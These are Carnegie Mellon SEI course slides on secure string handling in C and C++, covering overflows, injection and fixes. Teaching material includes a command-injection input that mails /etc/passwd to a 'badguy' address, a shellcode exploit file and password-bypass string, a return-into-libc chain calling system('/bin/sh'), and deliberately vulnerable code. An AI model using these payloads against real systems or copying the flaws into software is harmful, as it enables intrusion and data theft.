
Secure Coding in C and C++
Module 1, Strings
This material is approved for public release. Distribution is limited by the Software Engineering Institute to attendees.
2011 Carnegie Mellon University

This material is distributed by the SEI only to course attendees for their own individual study. Except for the U.S. government purposes described below, this material SHALL NOT be reproduced or used in any other manner without requesting formal permission from the Software Engineering Institute at permission@sei.cmu.edu.

This material was created in the performance of Federal Government Contract Number FA872105-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded research and development center. The U.S. Government's rights to use, modify, reproduce, release, perform, display, or disclose this material are restricted by the Rights in Technical Data-Noncommercial Items clauses (DFAR 252-227.7013 and DFAR 252-227.7013 Alternate I) contained in the above identified contract. Any reproduction of this material or portions thereof marked with this legend must also reproduce the disclaimers contained on this slide.

Although the rights granted by contract do not require course attendance to use this material for U.S. Government purposes, the SEI recommends attendance to ensure proper understanding.

THE MATERIAL IS PROVIDED ON AN AS IS BASIS, AND CARNEGIE MELLON DISCLAIMS ANY AND ALL WARRANTIES, IMPLIED OR OTHERWISE (INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE, RESULTS OBTAINED FROM USE OF THE MATERIAL, MERCHANTABILITY, AND/OR NON-INFRINGEMENT).
String Agenda
Strings
Common errors using NTBS
Common errors using basic_string
String Vulnerabilities
Mitigation Strategies
Summary
Strings
Strings constitute most of the data exchanged between an end user and a software system:
    command-line arguments
    environment variables
    console input
Software vulnerabilities and exploits are caused by weaknesses in
    string representation
    string management
    string manipulation
Null-Terminated Byte Strings 1

Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++.
[Figure: a character array terminated by \0, with the string length marked.]
Null-terminated byte strings (NTBS) consist of a contiguous sequence of characters terminated by and including the first null character. The C programming language supports the following types of null-terminated byte strings:
    single-byte character strings (type char)
    multibyte character strings (type char)
    wide character strings (type wchar_t)
Null-Terminated Byte Strings 2

Single-byte and multibyte character strings are both described as null-terminated byte strings.
A pointer to a single-byte or multibyte character string points to its initial character.

The length of the string is the number of bytes preceding the null character.
Null-terminated byte strings are implemented as arrays of characters and are susceptible to the same problems as arrays. As a result, secure coding practices for arrays should also be applied to null-terminated byte strings.
Arrays
One of the problems with arrays is determining the number of elements:
    void func(char s[]) {
        /* Number of elements is 4: s is a pointer here, and 4 is
           sizeof(char *) on a 32-bit platform */
        size_t num_elem = sizeof(s) / sizeof(s[0]);
    }
    int main(void) {
        char str[] = "Bring on the dancing horses";
        /* Number of elements is 28 */
        size_t num_elem = sizeof(str) / sizeof(str[0]);
        func(str);
    }
The strlen() function can be used to determine the length of a (properly) null-terminated byte string but not the space available in an array.
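The point about sizeof can be sketched as follows. Because an array parameter is really a pointer, one common approach is for the caller to pass the element count explicitly. The names `ARRAY_LEN` and `fill_with` are hypothetical and chosen only for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Element count of a true array; must not be applied to a pointer. */
#define ARRAY_LEN(a) (sizeof(a) / sizeof((a)[0]))

/* Hypothetical helper: the callee cannot recover the array size from s,
 * so the caller supplies it. Fills s with ch, null terminates it, and
 * returns the resulting string length. */
size_t fill_with(char *s, size_t s_size, char ch) {
    assert(s != NULL && s_size > 0);
    memset(s, ch, s_size - 1);   /* leave room for the terminator */
    s[s_size - 1] = '\0';
    return strlen(s);
}
```

A caller that owns the array, for example `char str[28];`, would call `fill_with(str, ARRAY_LEN(str), 'x')`. The string length returned is one less than the array size.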
Byte Character Types

The three types char, signed char, and unsigned char are collectively called the character types. Compilers have the latitude to define char to have the same range, representation, and behavior as either signed char or unsigned char. Irrespective of the choice made, char is a distinct type.
Wide Strings
A wide string is a contiguous sequence of wide characters terminated by and including the first null wide character. A pointer to a wide string points to its initial (lowest addressed) wide character. The length of a wide string is the number of wide characters preceding the null wide character.
Character Type Philosophy

Although not stated in one place, the C standard uses the following philosophy for choosing character types:

signed char and unsigned char
    suitable for small integer values

plain char
    the type of each element of a string literal
    used for character data (where signedness has little meaning) as opposed to integer data

int
    Used for data that could be either EOF (a negative value) or character data interpreted as unsigned char and then converted to int. Consequently, returned by fgetc(), getc(), getchar(), and ungetc(). Also accepted by the character handling functions from <ctype.h>, because they might be passed the result of fgetc() et al.
    [Figure: an int holding the bytes 00 00 00 FF.]
    The type of a character constant. Its value is that of a plain char converted to int. In C++, a character literal that contains only one character has type char.

unsigned char
    Used internally for string comparison functions, even though these operate on character data. As a result, the result of a string comparison does not depend on whether plain char is signed.
    Used for situations where the object being manipulated might be of any type and it is necessary to access all bits of that object, as with fwrite().
Use Plain char for Character Data 1

The CERT C Secure Coding Standard recommends STR04-C. Use plain char for characters in the basic character set for compatibility with standard string handling functions. In most cases, the only portable operators on plain char types are assignment and equality operators (=, ==, !=). An exception is the translation to and from digits. For example, if the char c is a digit, c - '0' is a value between 0 and 9.

    size_t len;
    char cstr[] = "char string";
    signed char scstr[] = "signed char string";
    unsigned char ucstr[] = "unsigned char";
    len = strlen(cstr);
    len = strlen(scstr);  /* warns when char is unsigned */
    len = strlen(ucstr);  /* warns when char is signed */

Compiling at high warning levels in compliance with [MSC00-C] results in warnings when converting from
    unsigned char[] to const char * when char is signed
    signed char[] to const char * when char is unsigned
Casts are required to eliminate these warnings, but excessive casts can make code difficult to read and hide legitimate warning messages. If this code were compiled using a C++ compiler, conversions from unsigned char[] to const char * and from signed char[] to const char * would be flagged as errors requiring casts.
std::basic_string
Standardization of C++ has promoted the standard template class std::basic_string. The basic_string class represents a sequence of characters.
    Supports sequence operations as well as string operations such as search and concatenation.
    Is parameterized by character type:
        string is a typedef for basic_string<char>
        wstring is a typedef for basic_string<wchar_t>
Strings in C++
The basic_string class is less prone to security vulnerabilities than null-terminated byte strings. Null-terminated byte strings are still a common data type in C++ programs. The use of null-terminated byte strings in a C++ program is unavoidable, except in rare circumstances:
    no string literals
    no interaction with existing libraries that accept null-terminated byte strings
Common String Manipulation Errors

Programming with null-terminated byte strings, in C or C++, is error prone. Common errors include
    improperly bounded string copies
    null-termination errors
    truncation
    write outside array bounds
    off-by-one errors
    improper data sanitization
Bounded String Copies

This program has undefined behavior if 8 or more characters are entered at the prompt, because the terminating null character is then written past the end of response[8].

    #include <stdio.h>
    #include <stdlib.h>

    void get_y_or_n(void) {
        char response[8];
        printf("Continue? [y] n: ");
        gets(response);
        if (response[0] == 'n')
            exit(0);
        return;
    }

This example uses only interfaces present in C99, although the gets() function has been deprecated in C99 and eliminated from C1X.
The CERT C Secure Coding Standard rule MSC34-C disallows the use of deprecated or obsolescent functions.
The gets() Function

    char *gets(char *dest) {
        int c = getchar();
        char *p = dest;
        while (c != EOF && c != '\n') {
            *p++ = c;
            c = getchar();
        }
        *p = '\0';
        return dest;
    }

The gets() function has no way to specify a limit on the number of characters to read.
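By contrast, fgets() takes the destination size as an argument. The following is a minimal sketch of a bounded line reader built on it. The name `read_line` and its return convention are assumptions made for illustration, and the sketch deliberately treats an over-long or unterminated line as a failure rather than truncating it silently.

```c
#include <assert.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: read one newline-terminated line from `in` into
 * dest (dest_size bytes). Returns 0 on success with the newline removed,
 * or -1 on EOF, read error, or a line that does not fit. */
int read_line(FILE *in, char *dest, size_t dest_size) {
    assert(in != NULL && dest != NULL);
    assert(dest_size > 1 && dest_size <= INT_MAX);
    if (fgets(dest, (int)dest_size, in) == NULL) {
        return -1;                       /* EOF or read error */
    }
    char *nl = strchr(dest, '\n');
    if (nl == NULL) {
        int c;
        while ((c = getc(in)) != '\n' && c != EOF) {
            /* discard the remainder of the over-long line */
        }
        return -1;
    }
    *nl = '\0';                          /* strip the newline, as gets() did */
    return 0;
}
```

In get_y_or_n(), the call `gets(response)` could then be replaced by `read_line(stdin, response, sizeof(response))` with a check of the return value.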
C++ Unbounded Copy

Inputting more than 11 characters in this C++ program results in an out-of-bounds write:

    #include <iostream>
    using namespace std;

    int main(void) {
        char buf[12];
        cin >> buf;
        cout << "echo: " << buf << endl;
    }
Simple Solution
Set width field to maximum input size.

    #include <iostream>
    using namespace std;

    int main(void) {
        char buf[12];
        cin.width(12);
        cin >> buf;
        cout << "echo: " << buf << endl;
    }

The extraction operation can be limited to a specified number of characters if ios_base::width is set to a value > 0.
After a call to the extraction operation, the value of the width field is reset to 0.
Simple Solution
Test the length of the input using strlen() and dynamically allocate the memory.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        if (argc < 2) {
            return EXIT_FAILURE;  /* argv[1] is a null pointer */
        }
        char *buff = malloc(strlen(argv[1])+1);
        if (buff != NULL) {
            strcpy(buff, argv[1]);
            printf("argv[1] = %s.\n", buff);
            free(buff);
        }
        else {
            /* Couldn't get the memory - recover */
        }
        return 0;
    }
Copying and Concatenation

It is easy to make errors when copying and concatenating strings because standard functions do not know the size of the destination buffer.

    int main(int argc, char *argv[]) {
        char name[2048];
        strcpy(name, argv[1]);
        strcat(name, " = ");
        strcat(name, argv[2]);
        ...
    }
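One way to make the destination size part of the operation is to build the string with snprintf() and check its return value. This is a sketch only. The helper name `format_pair` and the decision to clear the buffer on truncation are assumptions, not something the course material prescribes.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: build "key = value" in dest without overflowing it.
 * Returns 0 on success, -1 if the result would not fit or formatting failed. */
int format_pair(char *dest, size_t dest_size,
                const char *key, const char *value) {
    assert(dest != NULL && dest_size > 0 && key != NULL && value != NULL);
    int n = snprintf(dest, dest_size, "%s = %s", key, value);
    if (n < 0 || (size_t)n >= dest_size) {
        dest[0] = '\0';   /* do not leave a silently truncated string behind */
        return -1;
    }
    return 0;
}
```

With `char name[2048];`, the three calls in the example above would become `format_pair(name, sizeof(name), argv[1], argv[2])`, after first confirming that argc is at least 3.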
Null-Termination Errors
Another common problem with null-terminated byte strings is a failure to properly null terminate.
    int main(void) {
        char a[16];
        char b[16];
        char c[32];
        strncpy(a, "0123456789abcdef", sizeof(a));
        strncpy(b, "0123456789abcdef", sizeof(b));
        strncpy(c, a, sizeof(c));
    }

Neither a[] nor b[] is properly terminated.
From ISO/IEC 9899:1999

The strncpy() function

    char *strncpy(char * restrict s1, const char * restrict s2, size_t n);

copies not more than n characters (characters that follow a null character are not copied) from the array pointed to by s2 to the array pointed to by s1. Thus, if there is no null character in the first n characters of the array pointed to by s2, the result will not be null terminated.
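A common way to compensate for this behavior is to copy at most one character fewer than the destination holds and then write the terminator explicitly. The sketch below illustrates that idiom. The helper name `copy_terminated` and its return convention are hypothetical.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: copy src into dest and always null terminate.
 * Returns 1 if src fit completely, 0 if it was truncated. */
int copy_terminated(char *dest, size_t dest_size, const char *src) {
    assert(dest != NULL && src != NULL && dest_size > 0);
    strncpy(dest, src, dest_size - 1);   /* at most dest_size - 1 characters */
    dest[dest_size - 1] = '\0';          /* strncpy may not have written one */
    return strlen(src) < dest_size;
}
```

Applied to the 16-character literal from the earlier example and a 16-byte array, this stores the first 15 characters plus a terminator and reports truncation to the caller.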
String Truncation
Functions that restrict the number of bytes are often recommended to mitigate buffer overflow vulnerabilities:
    strncpy() instead of strcpy()
    fgets() instead of gets()
    snprintf() instead of sprintf()
Strings that exceed the specified limits are truncated. Truncation results in a loss of data and in some cases leads to software vulnerabilities.
Write Outside Array Bounds

    int main(int argc, char *argv[]) {
        int i = 0;
        char buff[128];
        char *arg1 = argv[1];
        while (arg1[i] != '\0' ) {
            buff[i] = arg1[i];
            i++;
        }
        buff[i] = '\0';
        printf("buff = %s\n", buff);
    }

Because null-terminated byte strings are character arrays, it is possible to perform an insecure string operation without invoking a function.
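The same loop can be made safe by bounding the index with the destination size. This is a minimal sketch. The function name `bounded_copy` is hypothetical, and truncating silently is an illustrative choice that a real program might replace with an error return.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: the copy loop with an added bound on the index.
 * Copies at most dest_size - 1 characters and always null terminates.
 * Returns the number of characters copied, excluding the terminator. */
size_t bounded_copy(char *dest, size_t dest_size, const char *src) {
    assert(dest != NULL && src != NULL && dest_size > 0);
    size_t i = 0;
    while (i < dest_size - 1 && src[i] != '\0') {
        dest[i] = src[i];
        i++;
    }
    dest[i] = '\0';
    return i;
}
```

A caller can detect truncation by comparing the return value with strlen(src).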
Off-by-One Errors
Can you find all the off-by-one errors in this program?

    int main(void) {
        int i;
        char source[10];
        strcpy(source, "0123456789");
        char *dest = malloc(strlen(source));
        for (i=1; i <= 11; i++) {
            dest[i] = source[i];
        }
        dest[i] = '\0';
        printf("dest = %s", dest);
    }
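For comparison after attempting the exercise, here is one possible corrected form of the copy, written as a function. It is a sketch, not the course's official answer, and the name `dup_string` is hypothetical. It allocates one extra byte for the terminator, indexes from 0, and stops before the terminator position.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: return a heap copy of src, or NULL on failure.
 * The caller frees the result. */
char *dup_string(const char *src) {
    assert(src != NULL);
    size_t len = strlen(src);
    char *dest = malloc(len + 1);        /* +1 for the null terminator */
    if (dest == NULL) {
        return NULL;
    }
    for (size_t i = 0; i < len; i++) {   /* indices 0 .. len - 1 */
        dest[i] = src[i];
    }
    dest[len] = '\0';                    /* last valid index is len */
    return dest;
}
```

The source array also needs room for its terminator. Declaring it as `char source[] = "0123456789";` lets the compiler size it at 11 bytes.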
Improper Data Sanitization

An application inputs an email address from a user and passes it as an argument to a complex subsystem (e.g., a command shell) [Viega 03].

    sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
    system(buffer);

The risk is that the user enters the following string as an email address:

    bogus@addr.com; cat /etc/passwd | mail some@badguy.net

This is an example of command injection.
[Viega 03] Viega, J., & Messier, M. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.
Injection
There are many types of injection:
    Command injection
    Format string injection
    SQL injection
    XML/XPath injection
    Cross-site scripting (XSS)
Enabled by not properly sanitizing a string that is then interpreted by a complex subsystem (such as an HTML parser)
Black Listing
Replaces dangerous characters in input strings with underscores or other harmless characters
    requires the programmer to identify all dangerous characters and character combinations
    may be difficult without having a detailed understanding of the program, process, library, or component being called
    may be possible to encode or escape dangerous characters after successfully bypassing black list checking
White Listing
Defines a list of acceptable characters and removes any characters that are unacceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. White listing can be used to ensure that a string only contains characters that are considered safe by the programmer.
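A white list check can be sketched in C with strspn(). The set of accepted characters below and the name `sanitize_whitelist` are assumptions made for illustration, and the sketch replaces rejected characters with underscores rather than removing them. A real application would choose the set that suits the subsystem being called.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: replace every character of s that is not in the
 * allow list with '_'. Returns the number of characters replaced. */
size_t sanitize_whitelist(char *s) {
    /* Illustrative allow list; an assumption, not a recommendation. */
    static const char ok_chars[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "1234567890_-.@";
    assert(s != NULL);
    size_t replaced = 0;
    const char *end = s + strlen(s);
    /* strspn() skips the longest run of allowed characters. */
    for (char *cp = s + strspn(s, ok_chars); cp != end;
         cp += strspn(cp, ok_chars)) {
        *cp = '_';
        replaced++;
    }
    return replaced;
}
```

Applied to the string `bogus@addr.com; cat /etc/passwd`, the semicolon, spaces, and slashes are all replaced, so the shell metacharacters never reach the command line.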
basic_string class
Size is not an issue

    string str1 = "hello, world.";
    size_t size = str1.size();

Concatenation is not an issue

    string str1 = "hello, ";
    string str2 = "world";
    string str3 = str1 + str2;
basic_string iterators
Iterators can be used to iterate over the contents of a string:
    string::iterator i;
    for (i=str.begin(); i != str.end(); ++i) {
        cout << *i;
    }

References, pointers, and iterators referencing string objects are invalidated by operations that modify the string, which can lead to errors.
Invalid Iterator
The following code attempts to sanitize an email address before passing it to a command shell.
    char input[];
    string email;
    string::iterator loc = email.begin();
    // copy into string converting ";" to " "
    for (size_t i=0; i <= strlen(input); i++) {
        if (input[i] != ';') {
            email.insert(loc++, input[i]);
        }
        else email.insert(loc++, ' ');
    }

Iterator loc is invalidated after the first call to insert().
Valid Iterator
    char input[];
    string email;
    string::iterator loc = email.begin();
    // copy into string converting ";" to " "
    for (size_t i=0; i <= strlen(input); ++i) {
        if (input[i] != ';') {
            loc = email.insert(loc, input[i]);
        }
        else loc = email.insert(loc, ' ');
        ++loc;
    }

The value of the iterator loc is updated as a result of each insertion.
basic_string Element Access

The index operator[] is unchecked.
    string bs("01234567");
    size_t i = f();
    bs[i] = '\0';

The at() method behaves in a similar fashion to the index operator[] but throws an out_of_range exception if pos >= size().

    string bs("01234567");
    try {
        size_t i = f();
        bs.at(i) = '\0';
    }
    catch (...) {
        cerr << "Index out of range" << endl;
    }
Getting a Null-Terminated Byte String

Often necessary for use with
    a standard library function that takes a char *
    legacy code that expects a char *

    string str = x;
    cout << strlen(str.c_str());

The c_str() method returns a const value.
    Calling free() or delete on the returned string is an error.
    Modifying the returned string can also lead to an error.
If you need to modify the string, make a copy first and then modify the copy.
String Agenda
Strings
Common errors using NTBS
Common errors using basic_string
String Vulnerabilities
    Program Stack
    Buffer Overflow
    Code Injection
    Arc Injection
Mitigation Strategies
Summary
Program Stack
The stack supports nested invocation calls. Information pushed on the stack as a result of a function call is called a frame. A stack frame is created for each subroutine and destroyed upon return.

    b() {}
    a() { b(); }
    main() { a(); }

Stack layout, from low memory to high memory:
    Unallocated
    Stack frame for b()
    Stack frame for a()
    Stack frame for main()
Stack Frames
A program stack is used to keep track of program execution and state by storing
    the return address in the calling function
    actual arguments to the function
    local variables of automatic storage duration
The address of the current frame is stored in a register (for example, EBP on Intel architectures). The frame pointer is used as a fixed point of reference within the stack. The stack is modified during
    function calls
    function initialization
    return from a function
Notation
There are two notations for Intel instructions.
    Microsoft uses the Intel notation.
    GNU C uses AT&T syntax.

    mov $4, %eax    // AT&T notation
    mov eax, 4      // Intel notation

Both of these instructions move the immediate value 4 into the EAX register.
Function Calls
    void function(int arg1, int arg2);

    function(4, 2);
    push 2                    ; push 2nd arg on stack
    push 4                    ; push 1st arg on stack
    call function (411A29h)   ; push the return address on stack and jump to address
Function Initialization
    void function(int arg1, int arg2) {
    push ebp        ; saves the frame pointer
    mov ebp, esp    ; frame pointer for subroutine is set to current stack pointer
    sub esp, 44h    ; allocates space for local variables

ebp: extended base pointer
esp: extended stack pointer
Function Return
    return();
    mov esp, ebp    ; restores the stack pointer
    pop ebp         ; restores the frame pointer
    ret             ; pops return address off the stack and transfers control to that location
Return to Calling Function
    function(4, 2);
    push 2
    push 4
    call function (411230h)
    add esp,8                 ; restores stack pointer
Sample Program
    bool IsPasswordOK(void) {
        char Password[12];             // Memory storage for pwd
        gets(Password);                // Get input from keyboard
        return 0 == strcmp(Password, "goodpass");
    }

    int main(void) {
        bool PwStatus;                 // Password status
        puts("Enter Password:");       // Print
        PwStatus=IsPasswordOK();       // Get and check password
        if (!PwStatus) {
            puts("Access denied");     // Print
            exit(-1);                  // Terminate program
        }
        else puts("Access granted");   // Print
    }
Sample Program Runs

[Screenshots: Run #1, correct password; Run #2, incorrect password.]
Stack Before Call to IsPasswordOK()

Code (EIP marks the current instruction)

    int main(void) {
        bool PwStatus;
        puts("Enter Password:");
        PwStatus=IsPasswordOK();
        if (!PwStatus) {
            puts("Access denied");
            exit(-1);
        }
        else puts("Access granted");
    }

Stack (ESP points to the top entry)
    Storage for PwStatus (4 bytes)
    Caller EBP, Frame Ptr OS (4 bytes)
    Return Addr of main, OS (4 bytes)
Stack During IsPasswordOK() Call

Code (EIP marks the current instruction)

    puts("Enter Password:");
    PwStatus=IsPasswordOK();
    if (!PwStatus) {
        puts("Access denied");
        exit(-1);
    }
    else puts("Access granted");

    bool IsPasswordOK(void) {
        char Password[12];
        gets(Password);
        return 0 == strcmp(Password, "goodpass");
    }

Stack (ESP points to the top entry)
    Storage for Password (12 bytes)
    Caller EBP, Frame Ptr main (4 bytes)
    Return Addr Caller, main (4 bytes)
    Storage for PwStatus (4 bytes)
    Caller EBP, Frame Ptr OS (4 bytes)
    Return Addr of main, OS (4 bytes)

Note: The stack grows and shrinks as a result of function calls made by IsPasswordOK(void).
Stack After IsPasswordOK() Call

Code (EIP marks the current instruction)

    puts("Enter Password:");
    PwStatus = IsPasswordOK();
    if (!PwStatus) {
        puts("Access denied");
        exit(-1);
    }
    else puts("Access granted");

Stack (the first three entries lie above ESP and are no longer allocated)
    Storage for Password (12 bytes)
    Caller EBP, Frame Ptr main (4 bytes)
    Return Addr Caller, main (4 bytes)
    Storage for PwStatus (4 bytes)
    Caller EBP, Frame Ptr OS (4 bytes)
    Return Addr of main, OS (4 bytes)
String Agenda
Strings
Common errors using NTBS
Common errors using basic_string
String Vulnerabilities
    Program stacks
    Buffer overflows
    Code Injection
    Arc Injection
What Is a Buffer Overflow?

A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure.
[Figure: a copy operation moves 16 bytes of data from source memory into destination memory where only 12 bytes are allocated; the excess is written into other memory.]
Buffer Overflows
Are caused when buffer boundaries are neglected and unchecked
Can occur in any memory segment
Can be exploited to modify a
    variable
    data pointer
    function pointer
    return address on the stack
Smashing the Stack for Fun and Profit (Aleph One, Phrack 49-14, 1996) provides the classic description of buffer overflows.
Smashing the Stack

Occurs when a buffer overflow overwrites data in the memory allocated to the execution stack. Successful exploits can overwrite the return address on the stack, allowing execution of arbitrary code on the targeted machine. This is an important class of vulnerability because of the
    occurrence frequency
    potential consequences
The Buffer Overflow 1

What happens if we input a password with more than 11 characters?
The Buffer Overflow 2

Code (EIP marks the current instruction)

    bool IsPasswordOK(void) {
        char Password[12];
        gets(Password);
        return 0 == strcmp(Password, "goodpass");
    }

Stack (ESP points to the top entry)
    Storage for Password (12 bytes): "123456789012"
    Caller EBP, Frame Ptr main (4 bytes): "3456"
    Return Addr Caller, main (4 bytes): "7890"
    Storage for PwStatus (4 bytes): "\0"
    Caller EBP, Frame Ptr OS (4 bytes)
    Return Addr of main, OS (4 bytes)

The return address and other data on the stack are overwritten because the memory space allocated for the password can only hold a maximum of 11 characters plus the null terminator.
The Vulnerability
A specially crafted string 1234567890123456j*! produced the following result.
What happened?
What Happened?
1234567890123456j*! overwrites 9 bytes of memory on the stack, changing the caller's return address, skipping lines 3-5, and starting execution at line 6.

    Line  Statement
    1     puts("Enter Password:");
    2     PwStatus=IsPasswordOK();
    3     if (!PwStatus)
    4         puts("Access denied");
    5         exit(-1);
    6     else puts("Access granted");

Stack
    Storage for Password (12 bytes): "123456789012"
    Caller EBP, Frame Ptr main (4 bytes): "3456"
    Return Addr Caller, main (4 bytes): "W*!" (return to line 6, was line 3)
    Storage for PwStatus (4 bytes): "\0"
    Caller EBP, Frame Ptr OS (4 bytes)
    Return Addr of main, OS (4 bytes)

Note: This vulnerability also could have been exploited to execute arbitrary code contained in the input string.
String Agenda
    Program stacks
    Buffer overflows
    Code Injection
    Arc Injection
Question
Q: What is the difference between code and data?
A: Absolutely nothing.
Code Injection
Attacker creates a malicious argument: a specially crafted string that contains a pointer to malicious code provided by the attacker. When the function returns, control is transferred to the malicious code.
    Injected code runs with the permissions of the vulnerable program when the function returns.
    Programs running with root or other elevated privileges are normally targeted.
Malicious Argument
Must be accepted by the vulnerable program as legitimate input. The argument, along with other controllable inputs, must result in execution of the vulnerable code path. The argument must not cause the program to terminate abnormally before control is passed to the malicious code.
./vulprog < exploit.bin

The get password program can be exploited to execute arbitrary code by providing the following binary data file as input (non-printable bytes are shown as "."):

    000  31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36  "1234567890123456"
    010  37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF  "789012345678...."
    020  31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB  "1..............."
    030  F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31  "...............1"
    040  31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A  "111/usr/bin/cal."

This exploit is specific to Red Hat Linux 9.0 and GCC.
Mal Arg Decomposed

    000  31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36  "1234567890123456"
    010  37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF  "789012345678...."
    020  31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB  "1..............."
    030  F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31  "...............1"
    040  31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A  "111/usr/bin/cal."

Offsets 000-00F: The first 16 bytes of binary data fill the allocated storage space for the password. NOTE: The version of the GCC compiler used allocates stack data in multiples of 16 bytes.
Offsets 010-01B: The next 12 bytes of binary data fill the storage allocated by the compiler to align the stack on a 16-byte boundary.
Offsets 01C-01F (E0 F9 FF BF): This value overwrites the return address on the stack to reference injected code.
Malicious Code
The object of the malicious argument is to transfer control to the malicious code. The malicious code
    may be included in the malicious argument (as in this example)
    may be injected elsewhere during a valid input operation
    can perform any function that can otherwise be programmed
    may simply open a remote shell on the compromised machine (as a result, is often referred to as shellcode)
Sample Shell Code

    xor %eax,%eax          #set eax to zero
    mov %eax,0xbffff9ff    #set to NULL word
    mov $0xb,%al           #set code for execve
    mov $0xbffffa03,%ebx   #ptr to arg 1
    mov $0xbffff9fb,%ecx   #ptr to arg 2
    mov 0xbffff9ff,%edx    #ptr to arg 3
    int $0x80              # make system call to execve

    arg 2 array (pointer array):  char * []={0xbffff9ff, "1111"};
    arg 1:                        "/usr/bin/cal\0"
Create a Zero
Create a zero value. Because the exploit cannot contain null characters until the last byte, the null pointer must be set by the exploit code.

    xor %eax,%eax          #set eax to zero
    mov %eax,0xbffff9ff    #set to NULL word

Use it to null terminate the argument list. This is necessary because an argument to a system call consists of a list of pointers terminated by a null pointer.
Shell Code
    xor %eax,%eax          #set eax to zero
    mov %eax,0xbffff9ff    #set to NULL word
    mov $0xb,%al           #set code for execve

The system call is set to 0xb, which equates to the execve() system call in Linux.
Shell Code
    mov $0xb,%al           #set code for execve
    mov $0xbffffa03,%ebx   #arg 1 ptr
    mov $0xbffff9fb,%ecx   #arg 2 ptr
    mov 0xbffff9ff,%edx    #arg 3 ptr

The last three instructions set up three arguments for the execve() call.

    arg 2 array (pointer array):  char * []={0xbffff9ff, "1111"};
    arg 1:                        "/usr/bin/cal\0"

The first array element, 0xbffff9ff, points to a NULL byte. The "1111" word is changed to 0x00000000; it terminates the pointer array and is also used for arg 3.
Data for the arguments is also included in the shell code.
Shell Code
    mov $0xb,%al           #set code for execve
    mov $0xbffffa03,%ebx   #ptr to arg 1
    mov $0xbffff9fb,%ecx   #ptr to arg 2
    mov 0xbffff9ff,%edx    #ptr to arg 3
    int $0x80              # make system call to execve

The execve() system call results in execution of the Linux calendar program.
Null Characters
The gets() function also has an interesting property: it reads characters from the input stream pointed to by stdin until end-of-file is encountered or a new-line character is read. Any new-line character is discarded, and a null character is written immediately after the last character read into the array. As a result, there might be null characters embedded in the string returned by gets() if, for example, input is redirected from a file. Similarly, data read by the fgets() function may also contain null characters. This issue is further documented in The CERT C Secure Coding Standard rule FIO37-C, "Do not assume that fgets() returns a nonempty string when successful."
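A practical consequence is that the familiar idiom `buf[strlen(buf) - 1] = '\0'` indexes before the start of the array when the first byte read is a null character, because strlen() then returns 0. The sketch below shows one alternative based on strcspn(). The helper name `strip_newline` is hypothetical.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: remove a trailing newline from a buffer filled by
 * fgets(). strcspn() returns the index of the first '\n', or of the null
 * terminator if there is none, so an empty string is handled safely.
 * Returns the resulting string length. */
size_t strip_newline(char *buf) {
    assert(buf != NULL);
    size_t len = strcspn(buf, "\n");
    buf[len] = '\0';
    return len;
}
```

This only addresses the newline handling. Data after an embedded null character is still invisible to the string functions and has to be dealt with separately if it matters to the application.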
String Agenda
    Buffer overflows
    Program stacks
    Code Injection
    Arc Injection
Arc Injection (return-into-libc)

Arc injection transfers control to code that already exists in the program's memory space.
    refers to how exploits insert a new arc (control-flow transfer) into the program's control-flow graph as opposed to injecting code
    can install the address of an existing function (such as system() or exec()), which can be used to execute programs on the local system
    allows for even more sophisticated attacks
Vulnerable Function
    #include <string.h>

    int get_buff(char *user_input, size_t size){
        char buff[40];
        memcpy(buff, user_input, size);
        return 0;
    }

    int main(void) {
        /* */
        get_buff(tainted_char_array, tainted_size);
        /* */
    }
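The flaw is that memcpy() trusts a caller-supplied size. A minimal sketch of a checked variant follows. The name `get_buff_checked` and the choice to reject oversized input (rather than truncate it) are assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical variant of get_buff(): reject sizes larger than the
 * destination instead of trusting the tainted size argument.
 * Returns 0 on success, -1 if the input does not fit. */
int get_buff_checked(const char *user_input, size_t size) {
    char buff[40];
    assert(user_input != NULL);
    if (size > sizeof(buff)) {
        return -1;                 /* would write past the end of buff */
    }
    memcpy(buff, user_input, size);
    /* ... use buff ... */
    return 0;
}
```

With this check in place, the copy can never reach the saved frame pointer or return address that follow buff on the stack.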
Exploit
Overwrites return address with address of existing function. Creates stack frames to chain function calls. Recreates original frame to return to program and resume execution without detection.
Result of memcpy() in get_buff()

Before overflow (esp at the top of buff, ebp at the saved frame pointer):
    buff[40]
    ebp (main)
    return addr (main)
    stack frame main

After overflow:
    buff[40]
    Frame 1
        ebp (frame 2)
        seteuid() address
        (leave/ret) address
        0
    Frame 2
        ebp (frame 3)
        system() address
        (leave/ret) address
        const *char "/bin/sh"
    Original Frame
        ebp (orig)
        return addr (main)

Function epilogue executed for return 0;

    mov esp,ebp
    pop ebp
    ret

[Figure sequence: the positions of esp, ebp, and eip relative to Frame 1, Frame 2, and the Original Frame as each epilogue instruction executes.]

